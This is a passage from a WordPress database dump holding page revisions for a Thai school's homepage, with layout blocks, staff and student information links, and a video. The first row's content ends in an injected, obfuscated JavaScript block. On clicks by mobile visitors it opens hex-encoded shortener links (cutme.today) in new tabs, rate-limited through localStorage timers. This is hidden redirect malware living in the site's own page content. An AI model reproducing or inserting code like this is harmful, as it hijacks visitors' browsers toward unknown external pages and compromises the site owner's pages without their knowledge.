_0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:21:41','2024-08-28 02:21:41','',19,'http://watprato.ssk.in.th/?p=233',0,'revision','',0),
(234,2,'2024-08-28 09:28:41','2024-08-28 02:28:41','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" 